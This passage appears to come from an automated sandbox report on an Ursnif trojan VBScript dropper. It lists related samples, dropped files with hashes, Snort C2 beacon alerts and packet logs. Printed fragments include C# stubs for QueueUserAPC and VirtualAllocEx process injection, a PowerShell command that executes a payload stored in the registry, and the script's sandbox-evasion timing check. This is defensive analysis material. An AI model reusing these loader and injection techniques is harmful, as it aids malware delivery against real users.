                                                    • 95.181.163.74
                                                    payment_verification_99351.vbsGet hashmaliciousBrowse
                                                    • 95.181.163.74
                                                    invoice_file_20193.vbsGet hashmaliciousBrowse
                                                    • 95.181.179.92

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    SPRINTHOSTRUZaRfpqeOYY.apkGet hashmaliciousBrowse
                                                    • 141.8.192.169
                                                    URS8.VBSGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    h4AjR43abb.exeGet hashmaliciousBrowse
                                                    • 185.251.88.208
                                                    documentation_446618.vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    start_information[754877].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    dAmDdz0YVv.exeGet hashmaliciousBrowse
                                                    • 185.251.88.208
                                                    start[873316].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    documentation[979729].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    run_documentation[820479].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    run[476167].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    run_presentation[645872].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    yXf9mhlpKV.exeGet hashmaliciousBrowse
                                                    • 185.251.88.208
                                                    mgdL2TD6Dg.exeGet hashmaliciousBrowse
                                                    • 185.251.88.208
                                                    documentation[979729].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    Pi2KyLAg44.exeGet hashmaliciousBrowse
                                                    • 185.251.88.208
                                                    oClF50dZRG.exeGet hashmaliciousBrowse
                                                    • 185.251.88.208
                                                    2K5KXrsoLH.exeGet hashmaliciousBrowse
                                                    • 185.251.88.208
                                                    1fbm3cYMWh.exeGet hashmaliciousBrowse
                                                    • 185.251.88.208
                                                    SecuriteInfo.com.PyInstaller.29419.exeGet hashmaliciousBrowse
                                                    • 141.8.197.42
                                                    Yc9We5U5L4.exeGet hashmaliciousBrowse
                                                    • 141.8.193.236

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):0.9260988789684415
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllulb/lj:NllUb/l
                                                    MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                    SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                    SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                    SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                    Malicious:false
                                                    Preview: @...e................................................@..........
                                                    C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.0.cs
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text
                                                    Category:dropped
                                                    Size (bytes):398
                                                    Entropy (8bit):4.993655904789625
                                                    Encrypted:false
                                                    SSDEEP:6:V/DsYLDS81zuJWLPMRSR7a1MIq+ZXIO1SRa+rVSSRnA/fHJGF0y:V/DTLDfu0LnQs9rV5nA/Ra0y
                                                    MD5:C08AF9BD048D4864677C506B609F368E
                                                    SHA1:23B8F42A01326DC612E4205B08115A4B68677045
                                                    SHA-256:EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
                                                    SHA-512:9688FD347C664335C40C98A3F0F8D8AF75ABA212A75908A96168D3AEBFC2FEAAB25DD62B63233EB70066DD7F8FB297F422871153901142DB6ECD83D1D345E3C2
                                                    Malicious:false
                                                    Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class stkml. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr xwiefclj,IntPtr fqsexnr,IntPtr ormij);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint llcs,uint flwnybjk,IntPtr coa);.. }..}.
                                                    C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):369
                                                    Entropy (8bit):5.2785904286076155
                                                    Encrypted:false
                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fr2SYMws+zxs7+AEszIWXp+N23frN:p37Lvkmb6KHB+WZE85
                                                    MD5:3AB2984207C5CA39AD2DCAD1AC4AA9E5
                                                    SHA1:FC1C2BEFD1BCC1F807622CA0188F674A133950D6
                                                    SHA-256:1A5C31EFECA3A9214894B012D7CE692DF37C648944C0941959C63EA46F31B566
                                                    SHA-512:D8082CE1F6CB54828C1F31CC7C2A26E59B19F8BC2B52E2C140E20385EB79D18A3DC274900424D96831BA593E886E5808744D7394F52F2A337FEA1F5DC9CE963D
                                                    Malicious:true
                                                    Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.0.cs"
                                                    C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.dll
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):3584
                                                    Entropy (8bit):2.592495678372235
                                                    Encrypted:false
                                                    SSDEEP:24:etGS4/u2Dg85lxlok3JgpiaCa4MatkZf0RaUI+ycuZhNQakSsPNnq:6pWb5lxF1aCSJ0J1ulQa38q
                                                    MD5:6B48B801F9F28023FBCB27DFF09E67D9
                                                    SHA1:022B840615E4B9F779F8651E5C1709E21F9726F1
                                                    SHA-256:8ABFBD9D3ED37B23C005C69520A05B13D120D34F3756887255AB4335E27349F6
                                                    SHA-512:9294111197351289764A42E246E7EA92D50BCB159E173DC9B81ED0AE23448D98C91383AC57341B8604C4CA19B0C57EAD432AF568D44D54D14C6D9C6B473F5F5A
                                                    Malicious:false
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ye;a...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1.*...................................................... 8............ E............ X.....P ......c.........i.....r.....z.....................c. ...c...!.c.%...c.......*.....3.+.....8.......E.......X.......................................!........<Module>.1cv1ijms.dll.stkml.W32.mscorlib.Sy
                                                    C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.out
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                    Category:modified
                                                    Size (bytes):412
                                                    Entropy (8bit):4.871364761010112
                                                    Encrypted:false
                                                    SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                    MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                    SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                    SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                    SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                    Malicious:false
                                                    Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                    C:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:MSVC .res
                                                    Category:dropped
                                                    Size (bytes):652
                                                    Entropy (8bit):3.10744871627024
                                                    Encrypted:false
                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryOak7YnqqsPN5Dlq5J:+RI+ycuZhNQakSsPNnqX
                                                    MD5:8D57783B20B153F231665683B2AB28BD
                                                    SHA1:848F359031382274CE273F9101163CF11C4CE29B
                                                    SHA-256:F2ECDB9A00574B4082B10E323E57CD1B68C403D1F0A1588B2C4C842F64ABE5E5
                                                    SHA-512:DEBC69E8A64B69BA4A3718985677E972AD7CAB4E2C645283DAF26AC67BF41F5BF101FD1A91AD928ED61018EEB470E9DE5EAD2FA55B2C6D0730435BC30E6E2D19
                                                    Malicious:false
                                                    Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.c.v.1.i.j.m.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.c.v.1.i.j.m.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                    C:\Users\user\AppData\Local\Temp\RESFECC.tmp
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):2184
                                                    Entropy (8bit):2.702642323022324
                                                    Encrypted:false
                                                    SSDEEP:24:pgZfpXhHGhKdNNI+ycuZhNQakSsPNnq9qp7e9Ep:KDxcKd31ulQa38q9Y
                                                    MD5:0E8427BDB83046818F9375BEC80FE27B
                                                    SHA1:619BDA194FAF92D4813C29D9CFE00D2E7C1A8754
                                                    SHA-256:AD03CFA40FC2E7E25137FE3DAFA4F47438AC97DF0F5A67F3B1235E764465CBC9
                                                    SHA-512:CFD17472042885A90FE3B8FBD24D1CF21B84A75E1C67956F6B130B1764452F3E7BD288108C354AB1A872E2D637BDCA27D2A33F23974DEECE1B4BAAA21D2C2213
                                                    Malicious:false
                                                    Preview: ........T....c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP................Wx; .S.1fV...(...........4.......C:\Users\user\AppData\Local\Temp\RESFECC.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b51iw0xu.4zo.ps1
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upl555bt.hac.psm1
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\AppData\Local\Temp\adobe.url
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):108
                                                    Entropy (8bit):4.699454908123665
                                                    Encrypted:false
                                                    SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
                                                    MD5:99D9EE4F5137B94435D9BF49726E3D7B
                                                    SHA1:4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
                                                    SHA-256:F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
                                                    SHA-512:7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
                                                    Malicious:false
                                                    Preview: [{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..
                                                    C:\Users\user\AppData\Local\Temp\fum.cpp
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):387072
                                                    Entropy (8bit):6.617827225958404
                                                    Encrypted:false
                                                    SSDEEP:6144:kZv2xLg5Ema5+kMLdcW2Ipsk0AOIjlllll/lllllWQO+XK+Mtw:kn5AUkaqIpWylllll/lllll7O+XLMtw
                                                    MD5:D48EBF7B31EDDA518CA13F71E876FFB3
                                                    SHA1:C72880C38C6F1A013AA52D032FC712DC63FE29F1
                                                    SHA-256:8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
                                                    SHA-512:59CBBD4ADA4F51650380989A6A024600BB67982255E9F8FFBED14D3A723471B02DAF53A0A05B2E6664FF35CB4C224F9B209FB476D6709A7B33F0A9C060973FB8
                                                    Malicious:true
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|...8st.8st.8st....st...9st...#st...+st.8su..st...2st...?st...9st...st...9st...9st.Rich8st.........................PE..L......Y...........!.....,..........9........@......................................%O....@.................................p...d................................%..`...T...............................@............@...............................text....*.......,.................. ..`.rdata...~...@.......0..............@..@.data...............................@....gfids..............................@..@.reloc...%.......&..................@..B................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.0.cs
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text
                                                    Category:dropped
                                                    Size (bytes):421
                                                    Entropy (8bit):5.017019370437066
                                                    Encrypted:false
                                                    SSDEEP:6:V/DsYLDS81zuJzLHMRSRa+eNMjSSRrLypSRHq1oZ6laAkKFM+Qy:V/DTLDfuxLP9eg5rLy4uMaLXjQy
                                                    MD5:7504862525C83E379C573A3C2BB810C6
                                                    SHA1:3C7E3F89955F07E061B21107DAEF415E0D0C5F5E
                                                    SHA-256:B81B8E100611DBCEC282117135F47C781087BD95A01DC5496CAC6BE334A8B0CC
                                                    SHA-512:BC8C4EAD30E12FB619762441B9E84A4E7DF15D23782F80284378129F95FAD5A133D10C975795EEC6DA2564EC4D7F75430C45CA7113A8BFF2D1AFEE0331F13E76
                                                    Malicious:true
                                                    Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tjuivx. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint yijswysfmu,uint rpdwbh);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr hkhhmwnsoyn,IntPtr xfehjdcey,uint nqamet,uint rvtfunn,uint mlrfbdrm);.. }..}.
                                                    C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.cmdline
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):369
                                                    Entropy (8bit):5.316801060470633
                                                    Encrypted:false
                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fVdndVH0zxs7+AEszIWXp+N23fVdJ:p37Lvkmb6KHPUWZE8JH
                                                    MD5:E984F490D4C2063ADC7968661E7CF282
                                                    SHA1:04103B456043B9D0B229C10538B0B0D993E597A9
                                                    SHA-256:45A08E1907D96F4A4A0AD6F751E7498FA62B72999D263DF4F08028F06E7B447E
                                                    SHA-512:706D4A06D0021EA9C82F02A4D62829228F9E2B9C56D184F906D6EC1562F4491A5039BA9AB27AAAE4A056D8531122AE9D02C08C0BED8162D71D8285217080AB7F
                                                    Malicious:false
                                                    Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.0.cs"
                                                    C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.out
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):454
                                                    Entropy (8bit):5.426901270421163
                                                    Encrypted:false
                                                    SSDEEP:6:IM7mLAA9VwRhMuAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fVdndVH0zxs7+AEz:xKIR37Lvkmb6KHPUWZE8Je
                                                    MD5:4336DDE59BD6F51034DF5F9C77845261
                                                    SHA1:01591543B59D6353AB7FAB8392868A12D3A5D570
                                                    SHA-256:A3E7D0FE9E5C5BD9F5585E52F47C6012105ACF061151AE765132A7F9836D5620
                                                    SHA-512:1E98FDFEC2DCEB0B99ACC0E02338365E2E3FCD53EC3692E393D2BF8366B616EAB2B86ABFE75CAC552E5BFE75576F3AAD07DF12C1DC32E3E923A97CEBC90AC911
                                                    Malicious:false
                                                    Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.0.cs"......
                                                    C:\Users\user\Documents\20210910\PowerShell_transcript.767668.YlCTH0VE.20210910070227.txt
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1189
                                                    Entropy (8bit):5.316207189770612
                                                    Encrypted:false
                                                    SSDEEP:24:BxSAqixvBnRWzx2DOXUWOLCHGIYBtBCWptHjeTKKjX4CIym1ZJXFOLCHGIYBtBjf:BZqevhUzoORFeVfqDYB1Z9FeNZZ5
                                                    MD5:04943686EDE108574C2C9FF3F9C199C5
                                                    SHA1:77587BAADB592CF5228FA2D939F1A55E762152BC
                                                    SHA-256:5FB3855BE26450340440903D2BEF71652EFAD956D36B623B8B6DCB8AAF897757
                                                    SHA-512:4DA982F49DC69997A79906A99418CDED43A1428AE37CE27F8E1264E40AAD73655AB6E0C75EA56F089E82B0CF57FA55B7C32654C75877889550AE661ABF1A5179
                                                    Malicious:false
                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210910070227..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 767668 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 4216..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210910070227..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..**********************..

                                                    Static File Info

                                                    General

                                                    File type:ASCII text, with very long lines, with CRLF line terminators
                                                    Entropy (8bit):4.859322582752409
                                                    TrID:
                                                      File name:start[526268].vbs
                                                      File size:1402115
                                                      MD5:b0de0a696f7b17724fef5c5e0af2bd1d
                                                      SHA1:3de72b8cae6a84f82e05cae18f48a1a302dbebc3
                                                      SHA256:e3a1fb3e932aae628aa08bde31be3b30861fa90ca16db4f81d7989093e1fddbe
                                                      SHA512:d04a7ac14bcb8b3310c009ebada2d0ee230fa64b92a48328c0a651391a2d37e1354123f96b9a463ef3ec9d140aa32e2a8d047d9baadaf5c563f6aaa23b084353
                                                      SSDEEP:12288:SfCepvwq9BTH3FEN9cy59WSpU9lAR4lYtE9E5rf99bM:ipvp9BT1U9cyjUAvmEZbM
                                                      File Content Preview:IHGsfsedgfssd = Timer()..For hjdHJGASDF = 1 to 7..WScript.Sleep 1000:..Next..frjekgJHKasd = Timer()..if frjekgJHKasd - IHGsfsedgfssd < 5 Then..Do: KJHSGDflkjsd = 4: Loop..End if ..const VSE = 208..const Aeq = 94..pgoTH = Array(UGM,DP,wy,2,yt,2,2,2,vy,2,2,

                                                      File Icon

                                                      Icon Hash:e8d69ece869a9ec4

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      09/10/21-07:02:17.572803TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4979080192.168.2.3185.251.90.253
                                                      09/10/21-07:02:17.572803TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4979080192.168.2.3185.251.90.253
                                                      09/10/21-07:02:18.547163TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4979180192.168.2.3185.251.90.253
                                                      09/10/21-07:02:18.547163TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4979180192.168.2.3185.251.90.253
                                                      09/10/21-07:02:19.594026TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4979280192.168.2.3185.251.90.253
                                                      09/10/21-07:02:44.225999TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4979380192.168.2.3185.251.90.253
                                                      09/10/21-07:02:44.225999TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4979380192.168.2.3185.251.90.253

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Sep 10, 2021 07:02:17.523480892 CEST4979080192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:17.571722031 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:17.571914911 CEST4979080192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:17.572803020 CEST4979080192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:17.662590027 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.024907112 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.024929047 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.024943113 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.024957895 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.024972916 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.024991035 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.025011063 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.025024891 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.025038958 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.025053978 CEST4979080192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:18.025101900 CEST4979080192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:18.025106907 CEST4979080192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:18.025528908 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.026364088 CEST4979080192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:18.074362040 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.074428082 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.074486017 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.074537992 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.074598074 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.074606895 CEST4979080192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:18.074647903 CEST4979080192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:18.074652910 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.074707031 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.074754000 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.074757099 CEST4979080192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:18.074801922 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.074850082 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.074852943 CEST4979080192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:18.074898958 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.074949980 CEST4979080192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:18.074950933 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.074999094 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.075050116 CEST4979080192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:18.075052023 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.075103045 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.075159073 CEST4979080192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:18.075206041 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.075253963 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.075304985 CEST4979080192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:18.075311899 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.075362921 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.075413942 CEST4979080192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:18.075417042 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.075505018 CEST4979080192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:18.124144077 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.124212980 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.124257088 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.124294043 CEST8049790185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:18.124331951 CEST8049790185.251.90.253192.168.2.3
